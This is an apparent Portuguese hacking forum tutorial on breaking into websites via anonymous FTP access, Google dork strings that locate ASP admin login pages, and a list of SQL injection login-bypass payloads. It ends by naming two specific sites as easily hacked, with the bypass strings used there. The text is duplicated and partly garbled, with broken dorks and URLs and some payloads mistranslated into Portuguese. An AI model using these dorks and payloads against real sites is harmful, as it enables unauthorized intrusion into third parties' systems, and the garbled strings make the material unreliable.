Invadindo via FTP
Vá em menu iniciar > executar > cmd > enter, Digite FTP FTP url do site, aperte enter, ele vai pedir o usuário, você digita "anonymous" aperta enter. Após isso, ele vai pedir a senha você digita qualquer coisa e aperta enter. Digite "dir" e aperte enter.
Feito isso vá a internet e no campo da url digite "ftp url do site" e aperta enter (com o cmd aberto) e você será redirecionado para as pastas do ftp do site.
Obs: Na url do site você deve digitar só o correto, exemplo: (http://www.xat.com, você deve digitar só xat.com, sem http://www, se não, ele não funciona.
Essa tática não funciona com todos os site, pois alguns tem uma proteção maior.
Invadindo via Strings
1) Acesse www.google.com.br
2) Pesquise por qualquer uma das strings abaixo
allinurladminindex.asp
allinurladmindefault.asp
allinurladminadmin.asp
allinurladminlogin.asp
allinurladminentrar.asp
allinurladmindefault.asp
allinurladminindex.asp
allinurladminlogin.asp
allinurladminpassword.asp
allinurladminsenha.asp
allinurlloginlogin.asp
allinurladmlogin.asp
allinurladmindex.asp
allinurladmdefault.asp
allinurlloginindex.asp
allinurllogindefault.asp
allinurlwebmasterlogin.asp
allinurlwebadmindefault.asp
allinurlwebadminindex.asp
allinurlwebadmindefault.asp
allinurlmenu_admindefault.asp
allinurlmenu_adminindex.asp
allinurlmenu_adminlogin.asp
allinurlnoticiasadmin
allinurlnewsadmin
allinurlcadastroadmin
allinurlportaladmin
allinurlsiteadmin
allinurlhomeadmin.asp
allinurlhomeadminindex.asp
allinurlhomeadmindefault.asp
allinurlhomeadminlogin.asp
allinurlwebadminindex.asp
allinurlwebadmindefault.asp
allinurlwebadminlogin.asp
allinurlhomeadmlogin.asp
allinurlhomeadmsenha.asp
allinurlhomeadmindex.asp
allinurlhomeadmdefaul.asp
allinurlmenuadminindex.asp
allinurlmenuadmindefault.asp
allinurlmenuadminlogin.asp
allinurlmenuadminadmin.asp
allinurlpaineladminadmin.asp
allinurlpaineladminlogin.asp
allinurlpaineladminindex.asp
allinurlpaineladmindefault.asp
allinurlsiteadmindefault.asp
allinurlsiteadminindex.asp
allinurlsiteadminlogin.asp
allinurlaspadminlogin.asp
allinurlaspadminindex.asp
allinurlpedidosadminindex.asp
allinurlpedidosadminlogin.asp
allinurlcomprasadmin
allinurlclientesadmin
allinurlbusinesadmin
allinurlarea_restritaadmin.asp
allinurlarea_restritalogin.asp
allinurlarea_restritaindex.asp
allinurlacessoadmin.asp
allinurlacessoadmindefault.asp
allinurlacessoadminindex.asp
allinurlpostadmindefault.asp
allinurlpostadmin
allinurlpostadminindex.asp
allinurlpostadminlogin.asp
allinurleshopadmin
allinurleshopadmin.asp
allinurleshopadmindefault.asp
allinurleshopadminindex.asp
allinurlcomercioadmin.asp
allinurlcomercioadmindefault.asp
allinurlcomercioadminindex.asp
allinurlnewsadminlogin.asp
allinurlnewsadmindefault.asp
allinurlnewsadminindex.asp
allinurlimprensalogin.asp
allinurlimprensaadmin.asp
allinurlimprensaadmindefault.asp
Após vocês pesquisarem,uma série de páginas serão encontradas. Wink
Arrow Geralmente quando voce acessa uma destas páginas,voce ira cair na tela de “login” do administrador,onde voce deve digitar o nome de usuario e a senha para conseguir acesso ADM do site.
É aqui que usamos o SQL injection,ao invés de colocarmos a senha,usamos algumas strings nos campos de logins,caso voce consiga acessar o painel de controle do ADM,é porque o site esta vulneravel a SQL injection.
Arrow Abaixo vou colocar algumas strings para voces colocarem nos campos de logins ( Só lembrando que cada string serve para o campo nome de usuario e o campo senha ao mesmo tempo Wink )
b' or ' 1='
' or '1
' or '
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
ou 0=0 --
ou 0=0 --
' ou 0=0 #
ou 0=0 #
ou 0=0 #
' ou ' x'='x
ou x=x
') ou (' x'='x
' ou 1=1 --
ou 1=1 --
ou 1=1 --
' ou a=a --
ou a=a
') ou (' a'='a
) ou (a=a
hi ou a=a
hi ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi) ou (a=a
aqui são alguns sites que é facil de hackear
ESSE FOI INVADIDO FACIL
http://www.wfbotai.comwfbotaiwebmastermain.asp
LOGIN b' or ' 1='
SENHA b' or ' 1='
httpwww.indfumco.comnewadminindex.aspaction=mainmenu
LOGIN b' or ' 1='
SENHA b' or ' 1='
2) Pesquise por qualquer uma das strings abaixo
allinurladminindex.asp
allinurladmindefault.asp
allinurladminadmin.asp
allinurladminlogin.asp
allinurladminentrar.asp
allinurladmindefault.asp
allinurladminindex.asp
allinurladminlogin.asp
allinurladminpassword.asp
allinurladminsenha.asp
allinurlloginlogin.asp
allinurladmlogin.asp
allinurladmindex.asp
allinurladmdefault.asp
allinurlloginindex.asp
allinurllogindefault.asp
allinurlwebmasterlogin.asp
allinurlwebadmindefault.asp
allinurlwebadminindex.asp
allinurlwebadmindefault.asp
allinurlmenu_admindefault.asp
allinurlmenu_adminindex.asp
allinurlmenu_adminlogin.asp
allinurlnoticiasadmin
allinurlnewsadmin
allinurlcadastroadmin
allinurlportaladmin
allinurlsiteadmin
allinurlhomeadmin.asp
allinurlhomeadminindex.asp
allinurlhomeadmindefault.asp
allinurlhomeadminlogin.asp
allinurlwebadminindex.asp
allinurlwebadmindefault.asp
allinurlwebadminlogin.asp
allinurlhomeadmlogin.asp
allinurlhomeadmsenha.asp
allinurlhomeadmindex.asp
allinurlhomeadmdefaul.asp
allinurlmenuadminindex.asp
allinurlmenuadmindefault.asp
allinurlmenuadminlogin.asp
allinurlmenuadminadmin.asp
allinurlpaineladminadmin.asp
allinurlpaineladminlogin.asp
allinurlpaineladminindex.asp
allinurlpaineladmindefault.asp
allinurlsiteadmindefault.asp
allinurlsiteadminindex.asp
allinurlsiteadminlogin.asp
allinurlaspadminlogin.asp
allinurlaspadminindex.asp
allinurlpedidosadminindex.asp
allinurlpedidosadminlogin.asp
allinurlcomprasadmin
allinurlclientesadmin
allinurlbusinesadmin
allinurlarea_restritaadmin.asp
allinurlarea_restritalogin.asp
allinurlarea_restritaindex.asp
allinurlacessoadmin.asp
allinurlacessoadmindefault.asp
allinurlacessoadminindex.asp
allinurlpostadmindefault.asp
allinurlpostadmin
allinurlpostadminindex.asp
allinurlpostadminlogin.asp
allinurleshopadmin
allinurleshopadmin.asp
allinurleshopadmindefault.asp
allinurleshopadminindex.asp
allinurlcomercioadmin.asp
allinurlcomercioadmindefault.asp
allinurlcomercioadminindex.asp
allinurlnewsadminlogin.asp
allinurlnewsadmindefault.asp
allinurlnewsadminindex.asp
allinurlimprensalogin.asp
allinurlimprensaadmin.asp
allinurlimprensaadmindefault.asp
Após vocês pesquisarem,uma série de páginas serão encontradas. Wink
Arrow Geralmente quando voce acessa uma destas páginas,voce ira cair na tela de “login” do administrador,onde voce deve digitar o nome de usuario e a senha para conseguir acesso ADM do site.
É aqui que usamos o SQL injection,ao invés de colocarmos a senha,usamos algumas strings nos campos de logins,caso voce consiga acessar o painel de controle do ADM,é porque o site esta vulneravel a SQL injection.
Arrow Abaixo vou colocar algumas strings para voces colocarem nos campos de logins ( Só lembrando que cada string serve para o campo nome de usuario e o campo senha ao mesmo tempo Wink )
b' or ' 1='
' or '1
' or '
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
ou 0=0 --
ou 0=0 --
' ou 0=0 #
ou 0=0 #
ou 0=0 #
' ou ' x'='x
ou x=x
') ou (' x'='x
' ou 1=1 --
ou 1=1 --
ou 1=1 --
' ou a=a --
ou a=a
') ou (' a'='a
) ou (a=a
hi ou a=a
hi ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi) ou (a=a
aqui são alguns sites que é facil de hackear
ESSE FOI INVADIDO FACIL
http://www.wfbotai.comwfbotaiwebmastermain.asp
LOGIN b' or ' 1='
SENHA b' or ' 1='
httpwww.indfumco.comnewadminindex.aspaction=mainmenu
LOGIN b' or ' 1='
SENHA b' or ' 1='